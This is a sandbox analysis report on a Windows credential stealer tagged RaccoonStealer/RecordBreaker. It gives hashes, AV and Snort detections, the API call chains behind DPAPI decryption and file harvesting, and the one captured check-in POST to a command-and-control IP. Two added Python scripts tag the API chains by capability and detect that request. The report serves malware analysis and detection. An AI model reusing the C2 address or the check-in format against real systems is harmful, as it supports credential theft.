
Windows Analysis Report
zRZljp49Uz

Overview

General Information

Sample Name: zRZljp49Uz (renamed file extension from none to exe)
Analysis ID: 650286
MD5: 0cfa58846e43dd67b6d9f29e97f6c53e
SHA1: 19d9fbfd9b23d4bd435746a524443f1a962d42fa
SHA256: 022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03
Tags: exe, RaccoonStealer, RecordBreaker

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Uses 32bit PE files
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to query locales information (e.g. system language)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Program does not show much activity (idle)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • zRZljp49Uz.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\zRZljp49Uz.exe" MD5: 0CFA58846E43DD67B6D9F29E97F6C53E)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Snort IDS Alerts

Timestamp: 06/22/22-12:00:13.668134
Source IP: 192.168.2.5
Destination IP: 51.195.166.184
Source Port: 49746
Destination Port: 80
Protocol: TCP
SID: 2036934
Classtype: A Network Trojan was detected

Timestamp: 06/22/22-12:00:13.668134
Source IP: 192.168.2.5
Destination IP: 51.195.166.184
Source Port: 49746
Destination Port: 80
Protocol: TCP
SID: 2036882
Classtype: A Network Trojan was detected


AV Detection

Source: zRZljp49Uz.exe | Avira: detected
Source: zRZljp49Uz.exe | Virustotal: Detection: 73%
Source: zRZljp49Uz.exe | Metadefender: Detection: 28%
Source: zRZljp49Uz.exe | ReversingLabs: Detection: 88%
Source: http://51.195.166.184/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A41806 lstrlen,LocalAlloc,LocalAlloc,lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,0_2_00A41806
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A41726 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,0_2_00A41726
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A417A1 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,0_2_00A417A1
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A4617D LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,0_2_00A4617D
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A43244 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,0_2_00A43244
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A427C6 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,0_2_00A427C6
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A42CC6 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,0_2_00A42CC6
Source: zRZljp49Uz.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: zRZljp49Uz.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A41E26 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,0_2_00A41E26
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A4AF2C LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,0_2_00A4AF2C
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A4643A LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,0_2_00A4643A
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A41B13 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,0_2_00A41B13
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A4B29D LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,0_2_00A4B29D
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A43C9D StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,0_2_00A43C9D
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A439E5 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,0_2_00A439E5
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A49DEA LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,0_2_00A49DEA
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A45870 LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,0_2_00A45870
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A4197C FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,0_2_00A4197C
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A46053 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,0_2_00A46053
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A45D00 LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,GetLogicalDriveStringsW,GetDriveTypeW,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,StrStrW,StrStrW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,StrStrW,GetEnvironmentVariableW,LocalFree,LocalFree,StrCpyW,LocalFree,LocalFree,0_2_00A45D00
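The "Code function" lines above list, per function, the imported APIs in call order as the sandbox recovered them. Read together they say more than any single signature: 0_2_00A41806 is a thin wrapper around CryptStringToBinaryA, the CryptoAPI base64 decoder, and the report counts 92 references to it, which fits the "potential string decryption" signature (strings decoded at run time rather than stored in clear); 0_2_00A43244, 0_2_00A427C6 and 0_2_00A42CC6 combine CryptUnprotectData (DPAPI) with a burst of GetProcAddress calls, CopyFileW and DeleteFileW, the copy-decrypt-delete sequence an analyst would expect from a stealer working on a locked browser database (that reading is the editor's, not a sandbox verdict); the FindFirstFileW/FindNextFileW functions walk directories, and 0_2_00A45D00 enumerates drives. The script below is an added example written for this page, not Joe Sandbox tooling: it parses five of the report's own lines and tags each chain with the capability its APIs imply. The rule table and tag names are the editor's assumptions, based on documented Win32 API semantics, not sandbox signature names.

```python
"""Tag Joe Sandbox "Code function" API chains with the capabilities they imply.

Added example for this page, not Joe Sandbox tooling. SAMPLE_LINES are copied
from the report above; RULES is the editor's table (an assumption), built on
documented Win32 semantics: CryptUnprotectData is DPAPI, CryptStringToBinary*
is CryptoAPI base64, Internet*/Http* is WinINet, and so on.
"""
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed input: five "Code function" lines taken verbatim from the report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A41806 lstrlen,LocalAlloc,LocalAlloc,lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,0_2_00A41806",
    r"Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A43244 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,0_2_00A43244",
    r"Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A4AF2C LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,0_2_00A4AF2C",
    r"Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A45D00 LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,GetLogicalDriveStringsW,GetDriveTypeW,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,StrStrW,StrStrW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,StrStrW,GetEnvironmentVariableW,LocalFree,LocalFree,StrCpyW,LocalFree,LocalFree,0_2_00A45D00",
    r"Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A479F3 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,InternetOpenW,InternetOpenW,InternetConnectW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlen,HttpSendRequestW,lstrlenW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,0_2_00A479F3",
]

# The report writes each chain as "<addr> api,api,...,<addr>"; the trailing
# address is a backreference so a chain is only accepted when it is complete.
LINE_RE = re.compile(r"Code function: (0_2_[0-9A-Fa-f]{8}) (\S+?),\1\s*$")

# (tag, APIs that must all be present, APIs of which at least one must be present)
RULES: Tuple[Tuple[str, frozenset, frozenset], ...] = (
    ("base64_cryptoapi", frozenset(), frozenset({"CryptStringToBinaryA", "CryptStringToBinaryW", "CryptBinaryToStringW"})),
    ("dpapi_decrypt", frozenset({"CryptUnprotectData"}), frozenset()),
    ("dir_enumeration", frozenset({"FindFirstFileW"}), frozenset()),
    ("copy_then_delete_file", frozenset({"CopyFileW", "DeleteFileW"}), frozenset()),
    ("special_folder_lookup", frozenset({"SHGetSpecialFolderPathW"}), frozenset()),
    ("drive_enumeration", frozenset({"GetLogicalDriveStringsW", "GetDriveTypeW"}), frozenset()),
    ("wininet_http", frozenset({"InternetOpenW", "InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW"}), frozenset()),
)
# Threshold (editor's choice) for calling repeated GetProcAddress use deliberate.
DYNAMIC_RESOLUTION_MIN = 4


def parse_code_function(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (address, [api, ...]) for a "Code function" line, else None."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    return m.group(1), m.group(2).split(",")


def tag_chain(apis: List[str]) -> List[str]:
    """Apply RULES to one API chain; tags come out in RULES order."""
    counts = Counter(apis)
    present = set(counts)
    tags = [tag for tag, all_of, any_of in RULES
            if all_of <= present and (not any_of or any_of & present)]
    if counts["GetProcAddress"] >= DYNAMIC_RESOLUTION_MIN:
        tags.append("dynamic_api_resolution")
    return tags


def analyze(lines: Iterable[str]) -> Dict[str, Dict[str, object]]:
    """Map each function address to its API count and capability tags."""
    result: Dict[str, Dict[str, object]] = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue  # AV lines, PE info and other non-chain evidence
        addr, apis = parsed
        result[addr] = {"api_count": len(apis), "tags": tag_chain(apis)}
    return result


def summarize(lines: Iterable[str]) -> List[str]:
    """Sorted union of all tags seen across the report's functions."""
    tags = set()
    for info in analyze(lines).values():
        tags.update(info["tags"])
    return sorted(tags)


if __name__ == "__main__":
    for addr, info in analyze(SAMPLE_LINES).items():
        print(addr, info["api_count"], ", ".join(info["tags"]) or "-")
    print("combined:", ", ".join(summarize(SAMPLE_LINES)))
```

Run on the full report rather than the five sample lines, the combined tag set is what a triage note should lead with; the per-function view is what you take into the disassembler, since the address in each line is the sandbox's label for that function.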

Networking

Source: Traffic | Snort IDS: 2036882 ET TROJAN Generic Stealer Config Download Request 192.168.2.5:49746 -> 51.195.166.184:80
Source: Traffic | Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.5:49746 -> 51.195.166.184:80
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | IP Address: 51.195.166.184
Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.166.184 (reported 5 times)
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 22 Jun 2022 10:00:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14
Connection: keep-alive
Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
X-DNS-Prefetch-Control: off
Expect-CT: max-age=0
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
Origin-Agent-Cluster: ?1
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
X-XSS-Protection: 0
ETag: W/"e-vDAjs2Bjp2gdskaBRytU+hHw1Ow"
Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
Data Ascii: Page not found
Source: zRZljp49Uz.exe, 00000000.00000002.415337506.0000000000802000.00000004.00000020.00020000.00000000.sdmp, zRZljp49Uz.exe, 00000000.00000003.414770587.0000000000802000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://51.195.166.184/
Source: unknown | HTTP traffic detected:
POST / HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: record
Host: 51.195.166.184
Content-Length: 95
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 61 6c 66 6f 6e 73 26 63 6f 6e 66 69 67 49 64 3d 35 39 63 39 37 33 37 32 36 34 63 30 62 33 32 30 39 64 39 31 39 33 62 38 64 65 64 36 63 31 32 37
Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=59c9737264c0b3209d9193b8ded6c127
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: 0_2_00A479F3 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,InternetOpenW,InternetOpenW,InternetConnectW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlen,HttpSendRequestW,lstrlenW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree,0_2_00A479F3
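The whole network activity of this run is the single POST above, which Snort matched as SIDs 2036882 and 2036934. The body is a form of the shape machineId=<GUID>|<username>&configId=<32 hex characters>, sent to a bare IP with no DNS lookup (hence the "TCP traffic detected without corresponding DNS query" lines), and the server answered 404 "Page not found". That failed check-in is why the report finds no config and rates the process as idle: whatever the sample would do after a successful config download never ran in this analysis. Two details worth checking by hand: the Content-Length of 95 matches the "Data Raw" bytes, not the "Data Ascii" rendering, because the sandbox substitutes "user" for the account name in the ASCII view while the hex still carries the real field; and the User-Agent is the bare string "record". The script below is an added example by the editor, not Joe Sandbox tooling and not the logic of the ET rules that fired: it rebuilds the request from the report's headers and hex, parses the form, and applies a small detection derived only from what is visible on this page. The benign login request used as a negative control is constructed.

```python
"""Decode and classify the check-in request recorded in the report.

Added example written for this page; not Joe Sandbox tooling and not the ET
Snort rules. CHECKIN_REQUEST is reconstructed from the report (headers as
shown, body from "Data Raw"); BENIGN_REQUEST is a constructed control.
"""
import re
from typing import Dict, Optional
from urllib.parse import parse_qs

# Body bytes copied from the report's "Data Raw" field (95 bytes, matching the
# Content-Length header). The report's "Data Ascii" line shows the second
# machineId field as "user"; the hex holds the sandbox account name.
DATA_RAW_HEX = (
    "6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d "
    "34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 61 "
    "6c 66 6f 6e 73 26 63 6f 6e 66 69 67 49 64 3d 35 39 63 39 37 33 37 32 36 "
    "34 63 30 62 33 32 30 39 64 39 31 39 33 62 38 64 65 64 36 63 31 32 37"
)

REQUEST_HEAD = (
    b"POST / HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"
    b"User-Agent: record\r\n"
    b"Host: 51.195.166.184\r\n"
    b"Content-Length: 95\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
CHECKIN_REQUEST = REQUEST_HEAD + bytes.fromhex(DATA_RAW_HEX)

# Constructed benign form POST (not from the report), used as a negative control.
BENIGN_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 25\r\n"
    b"\r\n"
    b"username=alice&remember=1"
)

GUID_RE = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
HEX32_RE = re.compile(r"^[0-9a-f]{32}$", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_http_request(raw: bytes) -> Dict[str, object]:
    """Minimal HTTP/1.1 request parser: request line, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def parse_checkin_body(body: bytes) -> Optional[Dict[str, str]]:
    """Extract machine GUID, user and config id if the body has the observed shape."""
    fields = parse_qs(body.decode("ascii", "replace"), keep_blank_values=True)
    machine = fields.get("machineId", [""])[0]
    config = fields.get("configId", [""])[0]
    guid, sep, user = machine.partition("|")
    if not (sep and GUID_RE.match(guid) and HEX32_RE.match(config)):
        return None
    return {"machine_guid": guid.lower(), "user": user, "config_id": config.lower()}


def checkin_verdict(raw: bytes) -> Dict[str, object]:
    """Score a request against the traits visible in this report's check-in."""
    req = parse_http_request(raw)
    headers = req["headers"]
    reasons = []
    if req["method"] == "POST" and headers.get("user-agent", "") == "record":
        reasons.append("POST with User-Agent 'record'")
    if IPV4_RE.match(headers.get("host", "")):
        reasons.append("Host header is a bare IPv4 address (no DNS lookup)")
    fields = parse_checkin_body(req["body"])
    if fields is not None:
        reasons.append("body is machineId=<GUID>|<user>&configId=<32 hex>")
    declared = int(headers.get("content-length", "-1"))
    return {
        "malicious": len(reasons) >= 2,   # two independent traits, editor's threshold
        "reasons": reasons,
        "fields": fields,
        "content_length_matches": declared == len(req["body"]),
    }


if __name__ == "__main__":
    for name, sample in (("checkin", CHECKIN_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, checkin_verdict(sample))
```

Note that the body parser accepts the observed shape only; a real rule should also tolerate percent-encoded field separators and a missing username, since the sandbox captured exactly one request and the format may vary across builds.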
Source: C:\Users\user\Desktop\zRZljp49Uz.exe | Code function: String function: 00A41806 appears 92 times